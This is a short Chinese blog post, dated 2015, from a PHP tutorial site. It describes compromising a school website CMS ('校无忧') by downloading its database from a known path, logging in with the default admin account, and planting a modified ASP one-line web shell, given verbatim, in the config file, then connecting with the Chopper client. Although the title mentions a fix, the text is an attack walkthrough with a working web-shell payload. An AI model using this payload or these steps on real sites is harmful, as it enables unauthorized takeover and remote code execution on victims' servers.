来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 以前的: 校无忧学校网站系统1.0 漏洞及修复其实呢,也算不上一个0day.只是一个思路罢了,最近无聊。无视上A5看了下,发现一个投票系统,粗略的看了下,用的人也挺多,于是就下下...
以前的: 校无忧学校网站系统1.0 漏洞及修复
其实呢,也算不上一个0day.只是一个思路罢了,最近无聊。无视上A5看了下,发现一个投票系统,粗略的看了下,用的人也挺多,于是就下下来,研究研究,本机搭建看了下,代码基本没什么漏洞,(可能是我技术不好吧,)于是转站,发现数据库,上网转了圈,基本上都可以下载数据库, 后台拿shell的方法呢, 在网站配置的地方插入一句话,这个普通的一句话是不能用的要用变异的一句话,插入,测试成功 一句话: 1 "%><%execute(request("xiaoma"))%><%' 嘿嘿,这个是变异的,普通的不能用哦 默认帐号密码:admin 这个通杀率很高,实在不行我们可一下载数据库 数据库地址:data/xiao5u.mdb 插入一句话以后。菜刀连接 www.2cto.com /inc/config.asp |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com